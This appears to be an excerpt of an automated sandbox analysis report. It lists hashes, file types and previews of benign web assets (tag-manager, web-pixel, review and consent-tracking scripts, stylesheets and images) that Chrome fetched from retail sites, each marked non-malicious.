                                                                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):73999
                                                                                                                                                                                    Entropy (8bit):5.45922969241985
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIj:qYW2Pj5yO7t2ACRg8398ge6LVR
                                                                                                                                                                                    MD5:E086EB99F82EC44B680D257D5BE0B958
                                                                                                                                                                                    SHA1:CEBCFA97EC2A5AD846DC10B3828AB9CE52697131
                                                                                                                                                                                    SHA-256:EB0BF3DD6AE4822473C0AD32270225E33AC11805AFE695AB4493D1E6C3B2E34F
                                                                                                                                                                                    SHA-512:59BA14B284BCC8DA4226337B28B05F70D60204205AA937A3F58F6AACC470507DBCE40E7D5CE68A4FE512B203870D5FED7BB07AFC3209565E7713542DCB261C29
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-17006751@84/sandbox/modern/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3501
                                                                                                                                                                                    Entropy (8bit):5.383873370647921
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                    MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                    SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                    SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                    SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fwww.bedbathandbeyond.com
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 516x516, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):10864
                                                                                                                                                                                    Entropy (8bit):7.976315483059282
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:aaBY1XI2Xba1R2apqXNHrtxBZfTfPGQoZH4GSVfPTrbjuk5j:rBYHLMR+9LvfP4ZH56jrbj1
                                                                                                                                                                                    MD5:D4B5AFA575D6A53A75D0D173E4E6F033
                                                                                                                                                                                    SHA1:870AABF904F2D46727F9C2C63DB9DB3A1584E3C3
                                                                                                                                                                                    SHA-256:3878FB14877D1AD2906201D88763829BB07C21D9DB35BC211EA93F5130534AF0
                                                                                                                                                                                    SHA-512:0275CC2B7F1461EEB5E592605022CC12278DCEF62F527525C91510623234F837B4B0A9FC42DDBFE4C2946BA3ACFED946639C858B11D03EEF1A692D2B9052167C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/02132023-MOPS-HP-Redesign-Frame2.jpg?imwidth=1920?imwidth=1920
                                                                                                                                                                                    Preview:RIFFh*..WEBPVP8 \*...E...*....>.r.S+&..&ZJ.`..in._.7.8........y...~w...|iC..........G.?]q......yh.....`.....y...O.{....!..B.....?.(l.....B.....?.(l.....B.....?.(l.....B.....?..u..=..c..R...kx.D....e..Z.....n..#Q.!..B..2+.$.:...]g?..h....Q...j.N....2...........D6.....K..K..9.|...Cg......{.. .._.I[.......=.%{..(.....Bq...%I..+...|..d}..7hGT....2Q.M.}.9..E........[>....KS..d9~8c..Ffoq... ..6..]r.ua?.(l........O..v....u..E.}..<m+...s..g..I..]./G+%.x.M..%.Z@...'_.g....OW.W........!I.t...9.....s....dg....R.aE../:,........3t.h........5f.mbU......G....'i,...?T..!Cg.d.c~..;...._.p...h..N.N.AP...O%P...2.x5r...&..........AB:..<+..x$...o.=x0..7......iL....K.[....v~.E..m~...E._....:....H.l...Tib.rw`y..U...4.....T.Q...R/.;....O.!..u.^..A...8.;.....h^.i.......yA$..=......H....m..6D...0oJ...v.R.c..Wp..{.A.).;.....u~....b.@..7.9..>.....S...r.!..\......=..[b'M....T...%+...!.+0..u..:!_S....b..j...u...t..zK.:b...A4....!.yg.Pd.4...,F)6.j..G..j..."-N...Op|...;.._d..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.742661756378496
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfsv3Af18lLOq1zALlJ6LUiqfktZLRDWLvwLa1zALNXQ4L4/GTL4OLV:YBFWlLjzALKLSktZLQLoLizALNXVL4eR
                                                                                                                                                                                    MD5:7B1D2549CF9AFB2A29A4146B18BE9067
                                                                                                                                                                                    SHA1:E06318111D3210AAAE10C1A50931B5D1724790BD
                                                                                                                                                                                    SHA-256:7CBC0D5E5344E002E5D1B07268F3E139BF30B77A7D082D57CDCE829108B83086
                                                                                                                                                                                    SHA-512:4C6021D403F9FAB1A984C9E582E3001B804C24A3185CC42F8E5A183229DE040F6D72482A57D7CBFF3F86E9E43D14F3488AC9FF8819E6B66F94996769FBC5229D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"34117129","rollup":{"average_rating":4.53,"rating_count":45,"review_count":45,"answered_questions":0}},{"page_id":"38113419","rollup":{"average_rating":4.27,"rating_count":15,"review_count":15,"answered_questions":0}},{"page_id":"36176187","rollup":{"average_rating":4.82,"rating_count":22,"review_count":22,"answered_questions":0}},{"page_id":"36501643","rollup":{"average_rating":4.37,"rating_count":41,"review_count":41,"answered_questions":0}},{"page_id":"36804334","rollup":{"average_rating":4.24,"rating_count":17,"review_count":17,"answered_questions":0}},{"page_id":"38404515","rollup":{"average_rating":3.8,"rating_count":5,"review_count":5,"answered_questions":0}},{"page_id":"39718442","rollup":{"average_rating":4.73,"rating_count":15,"review_count":15,"answered_questions":0}},{"page_id":"9463624","rollup":{"average_rating":4.75,"rating_count":177,"review_count":177,"answered_questions":0}},{"page_id":"28022197","rollup":{"average_rating":4.76
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):218707
                                                                                                                                                                                    Entropy (8bit):5.349049978644253
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:0n31oAwV0qlurW8Vh3e2Qgo/hhER3+M2S0ppIja6/iVK:0nlMurW8L3DQgo/XER3+M23ppIja6/cK
                                                                                                                                                                                    MD5:58924EAACE36350A280F4133E492B2EE
                                                                                                                                                                                    SHA1:6F353DDD6838D004ECF1D54B44A57A58BA6B2E51
                                                                                                                                                                                    SHA-256:6A82CC364E18036FE5373B8D7B688ACF5F6FAFF55A3A5580EE3A5F27070B7D90
                                                                                                                                                                                    SHA-512:A78CD042740B4F2334E171091D1553FAB99A2252C87C1A0227CDA3258038BD5243B1CC8AAE16E8572C258D908210527D9CE2906AD9887C78E056E6D468EBE183
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:import.meta;var Vn=Object.defineProperty,zn=Object.defineProperties,qn=Object.getOwnPropertyDescriptors,dr=Object.getOwnPropertySymbols,jn=Object.prototype.hasOwnProperty,Wn=Object.prototype.propertyIsEnumerable,Ae=(e,t)=>(t=Symbol[e])?t:Symbol.for("Symbol."+e),ur=e=>{throw TypeError(e)},Ce=(e,t,n)=>t in e?Vn(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,w=(e,t)=>{for(var n in t||(t={}))jn.call(t,n)&&Ce(e,n,t[n]);if(dr)for(var n of dr(t))Wn.call(t,n)&&Ce(e,n,t[n]);return e},P=(e,t)=>zn(e,qn(t)),d=(e,t,n)=>Ce(e,typeof t!="symbol"?t+"":t,n),hr=(e,t,n)=>t.has(e)||ur("Cannot "+n),E=(e,t,n)=>(hr(e,t,"read from private field"),n?n.call(e):t.get(e)),V=(e,t,n)=>t.has(e)?ur("Cannot add the same private member more than once"):t instanceof WeakSet?t.add(e):t.set(e,n),Y=(e,t,n,r)=>(hr(e,t,"write to private field"),r?r.call(e,n):t.set(e,n),n),z=function(e,t){this[0]=e,this[1]=t},_t=(e,t,n)=>{var r=(o,s,l,c)=>{try{var h=n[o](s),p=(s=h.value)instanceof z,m=h.done;Promise.resolve(p?
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (38868), with LF, NEL line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):239533
                                                                                                                                                                                    Entropy (8bit):5.35897836836547
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Q4DLZ59p9gl3Mh++mwSZmB0+fUd5MNaBTT2Wsg6:Q4DLjCl3j+mFpkUhTy5
                                                                                                                                                                                    MD5:F9483F0A62CDC235C3C68BF346E73063
                                                                                                                                                                                    SHA1:95C05F4D2DA9DFCC2D16E62E71EEECE1314D5E9F
                                                                                                                                                                                    SHA-256:415549AB1F904263D123E643E2450C3C34BE866D325E20DFD72D82EBD18CD773
                                                                                                                                                                                    SHA-512:535D4E18983E56AC1F0AE491B9FAC49914C0011899B57F63BB470007AF6671CDD65CB095EF1C10CA5528F9AF1FC403ED4657E390012B44BEC4D5786A7DDD603A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/8.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[8],{36984:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.BLANK_URL=t.relativeFirstCharacters=t.whitespaceEscapeCharsRegex=t.urlSchemeRegex=t.ctrlCharactersRegex=t.htmlCtrlEntityRegex=t.htmlEntitiesRegex=t.invalidProtocolRegex=void 0,t.invalidProtocolRegex=/^([^\w]*)(javascript|data|vbscript)/im,t.htmlEntitiesRegex=/&#(\w+)(^\w|;)?/g,t.htmlCtrlEntityRegex=/&(newline|tab);/gi,t.ctrlCharactersRegex=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,t.urlSchemeRegex=/^.+(:|&colon;)/gim,t.whitespaceEscapeCharsRegex=/(\\|%5[cC])((%(6[eE]|72|74))|[nrt])/g,t.relativeFirstCharacters=[".","/"],t.BLANK_URL="about:blank"},48068:(e,t,r)=>{"use strict";t.o=void 0;var n=r(36984);function o(e){try{return decodeURIComponent(e)}catch(t){return e}}t.o=function(e){if(!e)return n.BLANK_URL;var t,r,a=o(e);do{t=(a=o(a=(r=a,r.replace(n.ctrlCharactersRegex,"").replace(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (14295)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14345
                                                                                                                                                                                    Entropy (8bit):5.470148955001079
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:z+xdYmxjSeGZ2G+dAUMAwuPzifdgjB8yLCzVux9juRNXS8:zeYm9KNrUMAwmzadwxLCzVY9aRg8
                                                                                                                                                                                    MD5:6C7089520955559114DD8AE1C9155309
                                                                                                                                                                                    SHA1:6699A51084449EBE02F8D993D7A1CF319DC2E90A
                                                                                                                                                                                    SHA-256:17A3C5F33E798F7C361B47ED3A6FF3D7F6EC625BC39D4DA99E9A1D37A4C534BF
                                                                                                                                                                                    SHA-512:2FDAB7A90E032B2C30B39B319CF77DF4FAD6A1BC1E7B8D9EB7AC19D623291AAA9D1006E78FF93CF2CF9AF39BA0D6FA61FA8D10B0F3F8F4CEDE2F102B3D5C873F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shopifycloud/consent-tracking-api/v0.1/consent-tracking-api.js
                                                                                                                                                                                    Preview:!function(e){"use strict";const n={TRACKING_ACCEPTED:"trackingConsentAccepted",TRACKING_DECLINED:"trackingConsentDeclined",MARKETING_ACCEPTED:"firstPartyMarketingConsentAccepted",SALE_OF_DATA_ACCEPTED:"thirdPartyMarketingConsentAccepted",ANALYTICS_ACCEPTED:"analyticsConsentAccepted",PREFERENCES_ACCEPTED:"preferencesConsentAccepted",MARKETING_DECLINED:"firstPartyMarketingConsentDeclined",SALE_OF_DATA_DECLINED:"thirdPartyMarketingConsentDeclined",ANALYTICS_DECLINED:"analyticsConsentDeclined",PREFERENCES_DECLINED:"preferencesConsentDeclined",CONSENT_COLLECTED:"visitorConsentCollected",CONSENT_TRACKING_API_LOADED:"consentTrackingApiLoaded"},t="2.1",o={ACCEPTED:"yes",DECLINED:"no",NO_INTERACTION:"no_interaction",NO_VALUE:""},r={NO_VALUE:"",ACCEPTED:"1",DECLINED:"0"},c={PREFERENCES:"p",ANALYTICS:"a",MARKETING:"m",SALE_OF_DATA:"t"},i={MARKETING:"m",ANALYTICS:"a",PREFERENCES:"p",SALE_OF_DATA:"s"},a={MARKETING:"marketing",ANALYTICS:"analytics",PREFERENCES:"preferences",SALE_OF_DATA:"sale_of_dat
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):70943
                                                                                                                                                                                    Entropy (8bit):3.7777810238413783
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:WIcIOJ5DykjQG2fek0x1LJhZpMJQ+z+IoiorXAUWB5PL1fwcZuRwOv6ksHnD1Mjk:/qLjifezFJwUgCcZtnZX7v
                                                                                                                                                                                    MD5:05532E4294ECE62EE9AF0B01F9444A1A
                                                                                                                                                                                    SHA1:D9B3B7593B8AA4C7187A38D04CCF13763C63BF93
                                                                                                                                                                                    SHA-256:E2DE817BA2DC98107B6D5BE63656A8392AB9A564E9D422D4CD909997B6C93CB0
                                                                                                                                                                                    SHA-512:DAD1B41C683EFA2C7896B2C400C4A036C0FF1287AA22647C7823FF72A1169DF97DF9C3310C5DD650C4204FDCD6D57EBD780F177F2F9DBA0F344C5DCBB07D5BF2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/805x447_Evergreen_Desktop_A1.svg
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_6273_16330)">.<path d="M41.1778 142.026H63.0178V148.266H33.1378V120.266H62.5778V126.506H41.1778V131.106H58.8178V137.066H41.1778V142.026ZM78.2225 125.226C86.6625 125.226 91.7025 128.986 91.7025 135.826V144.066C91.7025 145.666 91.9825 146.986 92.6625 148.266H84.6625C84.2225 147.586 83.9025 146.746 83.9025 145.986V145.946C82.2225 147.706 79.1425 149.066 75.2225 149.066C70.5425 149.066 64.5825 147.226 64.5825 141.546C64.5825 135.866 70.5425 134.026 75.2225 134.026C79.1425 134.026 82.2225 135.386 83.9025 137.186V135.746C83.9025 132.386 81.4225 130.786 76.5825 130.786C73.9425 130.786 71.3425 131.146 68.6225 132.506L66.8225 127.506C69.8225 126.066 74.3825 125.226 78.2225 125.226ZM84.0625 141.746V141.306C82.5425 139.186 79.7425 138.626 77.4625 138.626C75.2225 138.626 72.2225 139.186 72.2225 141.546C72.2225 143.906 75.2225 144.466 77.4625 144.466C79.7425 144.466 82.5425 1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5159), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5159
                                                                                                                                                                                    Entropy (8bit):5.390112905312816
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:D95qB/PY3HvqwW3sQ+xz2z0oD7x6J133SWV25g8E+YpJpVTPf+K/HtSD:h54/PY3vW3sFxz2L7xWS8JpdJvYD
                                                                                                                                                                                    MD5:1DE55612987B9C843049262E24338767
                                                                                                                                                                                    SHA1:9D6F0F615003C76A7157D2498EB94706A5DE0C87
                                                                                                                                                                                    SHA-256:EBA998D92039B2324B9610F815C5651319C0CC044AC3345595FB9209AD09E9BD
                                                                                                                                                                                    SHA-512:548ABA1D86EC80AD38A9B75343C9FF6C9D27836D6A8B1E5F33A45050971E678ED9B059665A9B811C0B615612F513D23BCE06B676DCDA678759AE7DAA9355BD08
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(t){var n=function(t,n){if("object"!==e(t)||null===t)return t;var o=t[Symbol.toPrimitive];if(void 0!==o){var r=o.call(t,n||"default");if("object"!==e(r))return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===n?String:Number)(t)}(t,"string");return"symbol"===e(n)?n:String(n)}function n(e,n,o){return(n=t(n))in e?Object.defineProperty(e,n,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[n]=o,e}var o,r=new Uint8Array(16);function i(){if(!o&&!(o="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto)))throw new Error("crypto.getRandomValues
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):138682
                                                                                                                                                                                    Entropy (8bit):5.386451578484058
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:G9y6beCOLVk5RMCc9akDpv4nb93chh+UfrCbHxw:G9y6beCOLVk5RMCyZM93chh+UzCbHxw
                                                                                                                                                                                    MD5:54A789359912259A7A44D82F12EE6FB0
                                                                                                                                                                                    SHA1:4F6A418DE8788DB39C7CB23CBA8D274FA65E6233
                                                                                                                                                                                    SHA-256:ECE18901735C412045DE2DC19542513E807500F0A4D1E1B0EBF3B066172CDDDE
                                                                                                                                                                                    SHA-512:077908E1C0FA3A50C30F0A9EF89C59EA85A43DE3EE2181BFAE11F156F3C32FC796803F50214668461F6B60107D756F53CF4A706152F9E9C225CFA1442373E4CF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/t/70/assets/main.css?v=123706840855702943031729253391
                                                                                                                                                                                    Preview:*,:after,:before{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-gradient-from-position: ;--tw-gradient-via-position: ;--tw-gradient-to-position: ;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgba(59,130,246,.5);--tw-ring-offset-shadow:0 0 transparent;--tw-ring-shadow:0 0 transparent;--tw-shadow:0 0 transparent;--tw-shadow-colored:0 0 transparent;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):21862
                                                                                                                                                                                    Entropy (8bit):7.94084711495925
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:NnJu7OPKGqiUufUWEJ18Cst3R302SAl3/lLQpdCrIhCCRlBe1pali4XvZl:vu7O9xD8WS8NC2SAl3NMRhE1pSiCZl
                                                                                                                                                                                    MD5:E515E1C73105B4A2CD54448942D89074
                                                                                                                                                                                    SHA1:2EB7361FF84F9D320C8DF10432C1F83D7EA475C9
                                                                                                                                                                                    SHA-256:3A8554D5217BFB800B95BFC89A09304BA66E5748070CEB19C9C9CA321C2D3A70
                                                                                                                                                                                    SHA-512:93D35F3E07D6DB9B45607A509DF0A68FC31D30D79E7E36C63CAE4E3A0B84FB23AA2454AED6DA69CDD7B4A40AFD9148BBA46AB546C7C937B4AEF9CE0E71CBF573
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................2...d....s...@......r....QxRW...2..&U.J...D.xr....w.O.D..V'+F..zO=.R.Rc....G...&X..!.%=....l7..()"g......c4.=+.R.....v[..]nJ.YX.'+
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1881
                                                                                                                                                                                    Entropy (8bit):6.624932991680585
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVx4iUCTOXl7BEzjqc0kcsOdvKaA:NBIl/XrxtbTOXFionxML
                                                                                                                                                                                    MD5:84D7F624502EDA277CB106E2A3A61014
                                                                                                                                                                                    SHA1:230ADD513EB25958AE8CA3C9812B29784A3E4BF7
                                                                                                                                                                                    SHA-256:8DAA5C9B831AE262770D6075A58C77ADA5F0077DCFBAA36F906D9A80D70D9396
                                                                                                                                                                                    SHA-512:85BFAAD41521E27C73E7A80BAFA3BD68A60E550EF1DD696AD3311B3D789DB2251330D8C866C59164EC0F39D8C0FB7CC4EAB8D963DA9A44CE2D38040A4F7C9048
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P............................................................................................>.w... ..K2..{...Nb.....tIA.-.h.:..g..;s...F.G.K.)....N.......u0.y-J2................?...<..........................!1.A
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
